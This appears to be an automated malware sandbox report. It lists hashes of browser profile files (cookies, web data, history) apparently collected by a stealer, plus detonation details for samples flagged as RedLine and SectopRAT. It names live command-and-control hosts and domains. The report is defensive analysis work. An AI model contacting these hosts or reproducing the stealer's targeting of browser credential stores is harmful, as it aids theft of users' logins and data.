| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Web Data
| MD5 | 013b18b14247306181ec7ae01d24aa15 |
| SHA1 | 5ce4cb396bf23585fbcae7a9733fe0f448646313 |
| SHA256 | edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44 |
| SHA512 | 2035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\Trust Tokens
| MD5 | 767a7db34589653629c0d4299aa9eb7a |
| SHA1 | 57375ca0b80b3c856b76b3b080270686c90ccb8e |
| SHA256 | 78a4734f08b47286a3736c88c6fc481f76bd2b1a46e29d0920939f088ce899fd |
| SHA512 | a01b63edaceab16394320bd2d9152faac7f0c3971001049e8e931b6403f97d8e5e6f4e9020a446cfb573241321cfd26c3d982f30139799fa7fc32617cd1ec859 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\TransportSecurity
| MD5 | 0c749876fe02cc39c648dcd001460973 |
| SHA1 | a8cd63309f950fa72f04ebb7fe24bca942042a43 |
| SHA256 | 1165c38774e34818d2426599e88f4c5530d278436c6bdd1355bb23377880db34 |
| SHA512 | e6564f0e7744693aad5b98809c76446e442f3d8889ecd4b975ffe0d14eb00a7738297a21e6b603f5915f810a41df1414b17e9327701167ee3ab06245fe79a3d8 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\Reporting and NEL
| MD5 | c1fd34d324f8b92d2cbb2de54ce0ccad |
| SHA1 | b5ada6a12bdf4a7c3f8cc62cc678d08a6436ab85 |
| SHA256 | 0d9d951d841b127e2d6412eab3592240cc14fc359058d0b636e52611692495dd |
| SHA512 | 85e6f80a7e0b0a9fb805456240c4831125c2348b4aa20daa0b4d8d4b3e795acb41bb8e7d2070edc2a6760237795449326ab4c287e8da457b61ab77a2d43ceb7d |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\Network Persistent State
| MD5 | 94105fc29d0e352742accb97deaa7941 |
| SHA1 | 599166a2e18f7c20969d9c751d6abd5877cab53e |
| SHA256 | 6619d14cd191fc49098463da2192fc568c9929b3c8e782736e81ced9b570f543 |
| SHA512 | 8790ea19d1c3f7554e5b83abb68146a2db8e7247bfd182126a4452235737ef03a2e6a6ceefe73a8736e5ebcd6ae72ce03f31e97fa5e9c8d11ecfdb8f79bd31f6 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\Cookies
| MD5 | ff12c94ef03039fb2e4fa294a60a6fa6 |
| SHA1 | 6732d22010b388599c3ac21a949baa634b0f29a5 |
| SHA256 | 754c190b60ef98f87ca2a72bd9beacc7e966bb530bff0b4c1e413e513dc0a543 |
| SHA512 | 56d94981210c21e72e81bcfec0e01c2d65a92bc508eaca0f289ffb606d0a90d3bcf44937f1bb98337c690fd7d02162a92ec32ab7565657eb21d34ddf5cbf3fdf |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Shared Dictionary\cache\index-dir\the-real-index
| MD5 | 0ac9f82bc771808ef9835861c0a96c57 |
| SHA1 | 130b8c869a5d342dbb824e1c534fc1d9efbb6c62 |
| SHA256 | 1f27691328f6aaab734ff20559f6685ced0842cd60dfb654ad761e3834a21405 |
| SHA512 | a435c5171b3369734ba292da0d94abb6fad97cf816e3da45fcd4626fa2f7c3624f6bbfa31f3beff268dbe45b982bbc9fa14b22cca2be09287946a1847bd7b814 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\index
| MD5 | ff89d026b60c77f4b5f3af230c5b59cc |
| SHA1 | d1bad42b99b6ed4a19d26548d6955767c3bef576 |
| SHA256 | fee100a630901dc3f3b812bb78063906122a715292fe35646aab788fbf6d42d6 |
| SHA512 | b761fb21aa887e99cf60210de9d51fa96165bc6cfeebfca7c61f4211aab9e186fa06fc358491565d8f857651062c260fd44f1068df3c5975d31bab0a94504f2b |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\f_000004
| MD5 | aea210de6e462f7ea3d28b21409f736e |
| SHA1 | 0a055f0e1c244cf45fa53be951962069476232c0 |
| SHA256 | d9576b6f98e05db158a1f32b8560954e38cee41bc25245d22636b33f6d22c9f5 |
| SHA512 | fc50206beea496c49a5667e34ed9df19cd573f2119bd790fefc0205225080b0ddbce599c75ec41bc1058b1f6908731305a8dfe68b70376e8f39a3c7e8c395438 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\f_000003
| MD5 | abda4d3a17526328b95aad4cfbf82980 |
| SHA1 | f0e1d7c57c6504d2712cec813bc6fd92446ec9e8 |
| SHA256 | ee22a58fa0825364628a7618894bcacb1df5a6a775cafcfb6dea146e56a7a476 |
| SHA512 | 91769a876df0aea973129c758d9a36b319a9285374c95ea1b16e9712f9aa65a1be5acf996c8f53d8cae5faf68e4e5829cd379f523055f8bcfaa0deae0d729170 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\f_000002
| MD5 | 9666d74b18f57389ee2d3dee5073f71a |
| SHA1 | 1830bc2670e616a1da1af27157159e6677a5ad63 |
| SHA256 | 6fcb1e788f9a12b8ad937172802c41475f2180906db38d6507a3af6a2b721cae |
| SHA512 | 69ea6d6080b3ac00f4c4fcf9e00c9e16bd2c3373073f7dde3b1735fabeaaed1e7f8b76113e5ed2b9df08d089ca33ec367c595312f0c2f6e0fbad364464bc989b |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\data_3
| MD5 | ff9b853c9a2840df0cffad5bdd21858c |
| SHA1 | 4acb54fad01362391fd8ac305a3d1fe578f37857 |
| SHA256 | 2eca6b715168bb62e683fe7f91cb725a5d09b6bcd5334be8c2e39e0a3803564c |
| SHA512 | a4edb4ed06b4f17a203c74b6fd481a74993611e5b2f6cfe180420a16f973a639dfab661bd0329b4a0bd3d3517b3cbd505835be6ae463d2f772a0072bbf560aeb |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\data_2
| MD5 | 727ddba6c69d2e855820b57ad8a5cda7 |
| SHA1 | 2d53b1c7e3ab91a0c3a33cfcf75b7d9d3bf1e202 |
| SHA256 | 20b34e761ac58e4c1d3be056e0ca65e1372143e4dd4fad25c19f1f45f2e2fc19 |
| SHA512 | e3137d4f4b872046c2c0edf72b4a8f14751a2f265ae0703409a78ff2bd54f877924ec445b550e69d09171503cf47e6ddbbd341cfa7e935fb985add2545d3bc98 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\data_1
| MD5 | d8dbf364b20238077b3444ea9f95bf1f |
| SHA1 | b5af3b7feef18063e249b98b9e2a6e2b72dd2b56 |
| SHA256 | 7746092d06ab85c23df5414bf04a25d64d6d387d2f58cd178e8945e83de02d7d |
| SHA512 | 5cbb5b24e019590c78e4836ea87f11d0ed19bfef7e1ba134175e83175e7710981e62208c4e11680c1d359381b95b96aab402d6ce85de119d2ee56f2a979ae69b |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\data_0
| MD5 | 8c969485e8dee613b99aab8d9a019d07 |
| SHA1 | ea97456f892db89294ad282c67d92e0b472b0ee2 |
| SHA256 | 892ac0d94c22b3b19d3b553f25d668879d0a7c6f0ce15ab31034ea2b3863ee3b |
| SHA512 | eea19756553edd87a869dcc2c162361bba3e3ccba356f51754ac1bbd4b549eaf4005af8077df66f747766e6bb7dd4d38199e3e3e72be0fa27f69f4c3cb874781 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Service Worker\Database\LOG.old
| MD5 | d2cc07d7782e9653dfbfe05fc92c6a86 |
| SHA1 | 00acef9afda7d315894371aaeac3917e71247d4c |
| SHA256 | 68295269ece4f5348f53721b0200723a323341f64a07e1e09130c15da18650b5 |
| SHA512 | 9106b64c6928070c9ddcf878ea63b415cc0df22f0ed8c658d043b2fd9c90b737353224129731c53913369f0d35142662671641dc1d0586993ceebbbf25957977 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Favicons
| MD5 | b40e1be3d7543b6678720c3aeaf3dec3 |
| SHA1 | 7758593d371b07423ba7cb84f99ebe3416624f56 |
| SHA256 | 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4 |
| SHA512 | fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\History
| MD5 | f310cf1ff562ae14449e0167a3e1fe46 |
| SHA1 | 85c58afa9049467031c6c2b17f5c12ca73bb2788 |
| SHA256 | e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855 |
| SHA512 | 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Sync Data\LevelDB\000003.log
| MD5 | 12329231f7ef0babb1a3d2366e7bf731 |
| SHA1 | cf302cce06f5a421f76305d37c011bd09161caba |
| SHA256 | 932d5a161d5b36690ec15f24fcfb69c449770fa92880eaa4a4293ca1809a310f |
| SHA512 | 5f9ebc11080d5bdfe08f0c649d9d520d3fc073acb622201039e351301c1914af8430b41bf54900537ed5a1016d52c528ac8640ea444543ad3afba7d98202faa1 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Sync Data\LevelDB\LOG
| MD5 | f3d8ff70d2ebf16de9832ed74f1938c0 |
| SHA1 | 74c3fc09bc392887782c1306b901ab6703a0a698 |
| SHA256 | 8b7b4e45eaedeaa2b221e252058e67c7035750d238a1c823806c09a6517696f6 |
| SHA512 | bb0ea5efd9fd7a45b9c747d3523b32807cb9619d8fd077b52a93a4e11e2178b5094fef79ef7d30fd91cbc38d380caa095ceb33bba3e1e640f813a080b468030d |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Sync Data\LevelDB\LOG.old
| MD5 | c38575fd1e2f66b7b1b760f928db79e0 |
| SHA1 | 4729d07f8df9dd3582a87a56911b48ed6ff67ff7 |
| SHA256 | cff10d9e3f7dcc8ed49de2fed63e5bf21004cbc72cac471e41e5790f95237b5b |
| SHA512 | a83789e1be5f69b8da30f5324f5c88541f860e187064cf80a0d19b97dbe8bdc5397d02df12cfca11152199e43634e970d9dcdaedaffd8c5f0b57d40f57286f74 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Preferences
| MD5 | 8d7d2fbd5ed50a99c049e8f897b7786e |
| SHA1 | 3e8fa27e5b23cea33625b19ccec9615cd9ab8345 |
| SHA256 | c6f18a9722491e6592829d7c6f0a49c75e4e33b635b859b3d9febe1bb6af9670 |
| SHA512 | 748fe6cb705bf8123ea1429de936477ecfce971c3a2aeea7875600ca7e53a40b9ce93f2569f10946d0aac85c357168556535a5fe9ec43bc47599c7607219dcad |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\segmentation_platform\ukm_db
| MD5 | 3979944f99b92e44fa4b7dbcb6ee91c2 |
| SHA1 | df2161c70a820fe43801320f1c25182f891261a4 |
| SHA256 | 001d755b2b560945440023bf4ebfbda797cf5106419ac7dd270924b322f3ecf3 |
| SHA512 | 358e6dee698a63c2490c2fb5206516766fd8ace8f3d523509c29ff76aa6a984cb6381468f15bb4b9c084d9a470298b4cc11b0970e671ce0316243069ac4c8590 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Last Version
| MD5 | ef48733031b712ca7027624fff3ab208 |
| SHA1 | da4f3812e6afc4b90d2185f4709dfbb6b47714fa |
| SHA256 | c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99 |
| SHA512 | ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Visited Links
| MD5 | f0f7e9cbf2bc6585c9220a166c3de063 |
| SHA1 | 8efdab7445696e86abea5ecb467f297f4aee5557 |
| SHA256 | de73ffac5c865924206003acd3308a6660967e708444ab3e1c061637a1a469d5 |
| SHA512 | 0aec14b37eee953497870abb4e565a9212fce9074aaf302751002f5b464202a88d95678d2c66fdeebd88a5a16f7ade9dffc7652fed30b6a07427ae331f05bf79 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Service Worker\Database\LOG
| MD5 | a291a29ddcfeba0728514a002a62373e |
| SHA1 | f05d78564423f3aa53475ef65191a78c76017419 |
| SHA256 | a8407e37a87f5dfe326dd786998cb93b930eeb297bf14f6f27a86cfb95e191f2 |
| SHA512 | 2976f153a474cc2909c8392eb8e1b51cf469c45fc10336bc3a125d8ea1a69cfda134122f43487f6b4b1f73e74ba3064b4b3e0c4aff460f67802d6a275a4d1579 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\f_000008
| MD5 | 04382371c5067fd4e4845e6d540fb1dc |
| SHA1 | c9efdc1864b046c4ab9fca373f2f1d7e68849976 |
| SHA256 | 3efa565c2a522e0ed09dc08f9c4df3d64cc221f47cd64cda1e635d2ec5f025f4 |
| SHA512 | e0ca2683f47b257dedc4632f8216941b79a7c44ec016531b656de6a4486d08f02810132113a23611bc5c509745622bcfb1f92e5f72e7716c0744a921dd0a7cd7 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\f_000012
| MD5 | 400ee3db02edcf0377b8b08274e437df |
| SHA1 | 868f730ab5dd51a7353ec0e38dc03498543988fe |
| SHA256 | 8d48f552547076c027aa26a0a7e9aaec923a84dd4ed2193cccfb4cacef129a19 |
| SHA512 | 9174b7ff0754f9660237ec7030d992cf6e6b1bd55e8c11e46b70f400112c9ccceea2d28a05f4e8932af47b29ce11d3b8da2f669a71b402c4d08eff2d8046f74f |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\f_000014
| MD5 | 3669e98b2ae9734d101d572190d0c90d |
| SHA1 | 5e36898bebc6b11d8e985173fd8b401dc1820852 |
| SHA256 | 7061caa61b21e5e5c1419ae0dc8299142ba89c8169a2bd968b6de34a564f888a |
| SHA512 | 0c5f0190b0df4939c2555ec7053a24f5dae388a0936140d68ed720a70542b40aaf65c882f43eb1878704bea3bd18934de4b1aac57a92f89bbb4c67a51b983ae3 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\f_000015
| MD5 | c1164ab65ff7e42adb16975e59216b06 |
| SHA1 | ac7204effb50d0b350b1e362778460515f113ecc |
| SHA256 | d7928d8f5536d503eb37c541b5ce813941694b71b0eb550250c7e4cbcb1babbb |
| SHA512 | 1f84a9d9d51ac92e8fb66b54d103986e5c8a1ca03f52a7d8cdf21b77eb9f466568b33821530e80366ce95900b20816e14a767b73043a0019de4a2f1a4ffd1509 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\f_000016
| MD5 | b63bcace3731e74f6c45002db72b2683 |
| SHA1 | 99898168473775a18170adad4d313082da090976 |
| SHA256 | ea3a8425dcf06dbc9c9be0ccd2eb6381507dd5ac45e2a685b3a9b1b5d289d085 |
| SHA512 | d62d4dddb7ec61ef82d84f93f6303001ba78d16fd727090c9d8326a86ab270f926b338c8164c2721569485663da88b850c3a6452ccb8b3650c6fa5ce1ce0f140 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Cache\Cache_Data\f_000017
| MD5 | 9978db669e49523b7adb3af80d561b1b |
| SHA1 | 7eb15d01e2afd057188741fad9ea1719bccc01ea |
| SHA256 | 4e57f4cf302186300f95c74144cbca9eb756c0a8313ebf32f8aba5c279dd059c |
| SHA512 | 04b216bd907c70ee2b96e513f7de56481388b577e6ccd67145a48178a605581fab715096cfb75d1bb336e6ad0060701d2a3680e9f38fe31e1573d5965f1e380a |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Local State
| MD5 | 9767e15a33cc1505d439c209bcf264f1 |
| SHA1 | b5732f64c9ba0b1f56b5766806fa1bb6823d6773 |
| SHA256 | 9148bdc0e17aa7cd25c71da2ab93664b075f900e92d2fb5986bf5c330dad7e90 |
| SHA512 | 196a9a95d4d84079115a606e583b8bcb741d2f3b4cf28c0d07b5d7d73b40bd64607049769c6e9de668d3111db11eaa80e138822809dc29dbf1666b106b56e3a8 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\01442016-fd50-4eee-87ff-46d71668bbd3.tmp
| MD5 | 3ac0a1243d40154da05149ecfcbb58bf |
| SHA1 | b67c5a3c4bb286d1ac72a12b8e27a4df09a65171 |
| SHA256 | 4e0efa599c82028a82018cfd4ae43b7bdd429d957aed6f98d3696f8119112d92 |
| SHA512 | dff2bb7089a4b2b6ba620f65ee1e6e720101a49a311c54f985371cf0c9bdc3d1073cedf928168683f2dad6640e40390d056283b6f7dcf667ccec2f57b73dd1af |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Preferences
| MD5 | ef1dfd4a355b9a07661c7ad10c068ab1 |
| SHA1 | a000bace60b5aa2e6c8a1bf9e0aadc0c45401fc0 |
| SHA256 | 7e11a3845dd871ba3eeece41e94556537fd2e171068b807df6c0c9f4c8209785 |
| SHA512 | 07d3afe9189ade0998784303cb2d01bdfb981f9bc7c4cd4e23f06c1b44a0f16b1a44c0264c04070aa0a4359c45e03c3e72dc3e541ee59ac621932fca5f8eef95 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\TransportSecurity
| MD5 | 95d01559ec4d39b76c01fcf8ee712f09 |
| SHA1 | a1b1cb5c1c50dc5bcac4292160d137a6f33dc996 |
| SHA256 | cc0a80d29459b405cb4754a5c4a8350837b310bb76cb8d35019d7073a7ba88c2 |
| SHA512 | e6f7e1364c500c83880d9f1e2d7585e69c8d8cabe73f034f6195b2ae1e519bf234038949b0c89d2a1d56d986b1bc29e3555bb076c6fe57ca31c9303bdf4c20c1 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Code Cache\js\index-dir\the-real-index~RFe583757.TMP
| MD5 | 70d0f54923d084de0cb7cc96af5daca4 |
| SHA1 | 83c969dd564152318d26a35049365f288254558d |
| SHA256 | 9c02ea064d17754ed3ab990eec81e9ddc72c1db78dbc40ae4ddb09c8c9afca3d |
| SHA512 | 56686751b2b6ea513dc8e8edb8fc38ce2f2d98e3e9397073d0f19642990debc3b1fd63d9ecb5e36bcc757de66f54f1af6a3c78ddd7167e28fbc1a22d9d7f4d08 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 55eebcff5ea912e5c02071f76aede3e3 |
| SHA1 | 714a19e81108ae3d605c95e5de3f6d833a0db345 |
| SHA256 | 6908b8042d52c7ebb2b32afb5880c1b2e38ed6312bd2bc77de4838ff4de0be7a |
| SHA512 | ef491a1e237d4e358108008ef4b88849bf8c3b414d77b3bcd29be0c2a30835643fe37c01ce745bd4df46d51f44241679b4682078cff55bc30a387eebcdb043d5 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Preferences
| MD5 | 84c58685ca417434238726d54eadbf83 |
| SHA1 | ce28fab6dca362e4601b325168329f5c534068b2 |
| SHA256 | db970c4a6f1039b0c483a401c8c248d47a82b544201313c32a5dea426c03dd2b |
| SHA512 | 657cbe70db120cbb526bc9452119b5b6419db5d1a92cdac0268075de6467fa973e14a2ca0f9bb379baafc04ad47175fd768fa84fe7653675f84d7b404b30db18 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Local State
| MD5 | 18bb216119f5133734de8206a8d95abd |
| SHA1 | 266c862f89854c7fd1d5f73bec62d24cc48f92fe |
| SHA256 | df11b72443397bf3fc5f78879ae7facd307bdb5f98169f4777f5bcfd2e940c82 |
| SHA512 | 793080c4928e8ef99b2e9a75df7ab96c33389857b113cbad1022020fe9549bd2682ac0732f3b802bfcc843b14a1d2a8fa18aeedff6f9576a21c7ad662a834848 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\TransportSecurity
| MD5 | 6b8bffbec79bc45900ad16870b41d3bc |
| SHA1 | 1aead729a11f4ee06d2d8b7401cd29f88a3923ca |
| SHA256 | e6766eceac3ea14587e3a1000540e037278349f9f8e4b7b4163a708af7cce19d |
| SHA512 | 21c9c8921461ff12b008f40c72ec6749bade9cbe0ef54f3c9f24bbe1b40d877084b715ccb4a006adf70eb2b24f7632ddfaa1cfd818fa523389f0efb3a1dd7879 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Preferences
| MD5 | ed1cb4f78e08e199bdf5a38ed6d0c2c3 |
| SHA1 | 0d25ae9656cd41c80d468009b80ec1f876b1f78d |
| SHA256 | f2ff21dba38aa1b5e0b101a7072d21d23fbf074b37eae8a56728605885baef0b |
| SHA512 | 0607d3c701e3e9fa2779ebe72bae779461c0bc6ca1ef0a254616c46ef2f59b5a47b3573fe6dabe4e7ab7aeb240bdd5cf88f68f48fba4e0cb0cd8ee5e9bf4bc67 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\Network Persistent State
| MD5 | 73680f7438c9226a4e274cd46486db27 |
| SHA1 | 45eaf851cde39db154a73eb0fadd487d43d889dc |
| SHA256 | 7c5a76c268c6990612a0556e68eb95dc5ffff2b3c722dce34a161ef8d15e8e1b |
| SHA512 | 7011e67a5fd24a179cf2de18d86f4254f5fd359bd5493dd783522f6e1b1a3270610cfd88be7fa74c4f7edb1aeb5799b387c1c584fd4757d4be3ad30eb8326238 |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Network\TransportSecurity
| MD5 | 9c4ebef738255451cfefce727c90b913 |
| SHA1 | 56a45918dfbc638af214b684de4bdaadbf2fbfb6 |
| SHA256 | e8884cc255d43d5ec0fe1720385475e7b022cfcce555666b5f0713f7a12835ce |
| SHA512 | b6e0c8f46ef16e3ee8309fc2a5a390f50f51b570212b34db7981baf42781c0bb074a52ef2f3395dd2f298cea8cf8e65e6e9f642a1ce7bf14b2437de51cc899fa |
C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Default\Preferences
| MD5 | 162ec531409ff6077ebcffb2ce225f7f |
| SHA1 | 90c3f1f75352b76dce94f3e131b5dfd5aef3204c |
| SHA256 | ac7c072355d006c65882772c83d80904c3950d062f21ebc000aa3ad5263aaa04 |
| SHA512 | 5b59dd8cb52bb9d2013ceb0e75dd6980c86504f702cacffd6c199dc0de45b8a86089563feead80cc24cd107bde29a92d2265892b9416731f0d1a39affde09452 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
144s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8TJVK.tmp\IDWCH2.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8TJVK.tmp\IDWCH2.tmp | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-8TJVK.tmp\IDWCH2.tmp | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3120 wrote to memory of 3636 | N/A | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | C:\Users\Admin\AppData\Local\Temp\is-8TJVK.tmp\IDWCH2.tmp |
| PID 3120 wrote to memory of 3636 | N/A | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | C:\Users\Admin\AppData\Local\Temp\is-8TJVK.tmp\IDWCH2.tmp |
| PID 3120 wrote to memory of 3636 | N/A | C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe | C:\Users\Admin\AppData\Local\Temp\is-8TJVK.tmp\IDWCH2.tmp |
Processes
C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe
"C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe"
C:\Users\Admin\AppData\Local\Temp\is-8TJVK.tmp\IDWCH2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8TJVK.tmp\IDWCH2.tmp" /SL5="$A0048,506127,422400,C:\Users\Admin\AppData\Local\Temp\IDWCH2.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the-flash-man.com | udp |
| US | 8.8.8.8:53 | best-link-app.com | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.209.201.84.in-addr.arpa | udp |
Files
memory/3120-2-0x0000000000401000-0x000000000040B000-memory.dmp
memory/3120-0-0x0000000000400000-0x000000000046D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-8TJVK.tmp\IDWCH2.tmp
| MD5 | 6020849fbca45bc0c69d4d4a0f4b62e7 |
| SHA1 | 5be83881ec871c4b90b4bf6bb75ab8d50dbfefe9 |
| SHA256 | c6c796f0d37e1a80632a295122db834499017b8d07728e0b5dfa6325ed3cab98 |
| SHA512 | f4c359a9ebf362b943d10772efe9cfd0a0153c1ff866ffdf1223e16e544dfa2250f67e7a7682d2558761d36efe15c7de1a2c311bc67b162eb77394ef179924eb |
memory/3636-6-0x0000000000400000-0x0000000000516000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-3USED.tmp\idp.dll
| MD5 | 8f995688085bced38ba7795f60a5e1d3 |
| SHA1 | 5b1ad67a149c05c50d6e388527af5c8a0af4343a |
| SHA256 | 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006 |
| SHA512 | 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35 |
memory/3636-19-0x0000000000400000-0x0000000000516000-memory.dmp
memory/3120-21-0x0000000000400000-0x000000000046D000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win7-20240903-en
Max time kernel
130s
Max time network
146s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1644 set thread context of 2492 | N/A | C:\Users\Admin\AppData\Local\Temp\NAN.exe | C:\Users\Admin\AppData\Local\Temp\NAN.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\NAN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\NAN.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NAN.exe
"C:\Users\Admin\AppData\Local\Temp\NAN.exe"
C:\Users\Admin\AppData\Local\Temp\NAN.exe
C:\Users\Admin\AppData\Local\Temp\NAN.exe
Network
| Country | Destination | Domain | Proto |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp | |
| RU | 87.251.71.14:89 | tcp |
Files
memory/1644-0-0x000000007491E000-0x000000007491F000-memory.dmp
memory/1644-1-0x0000000001380000-0x000000000141E000-memory.dmp
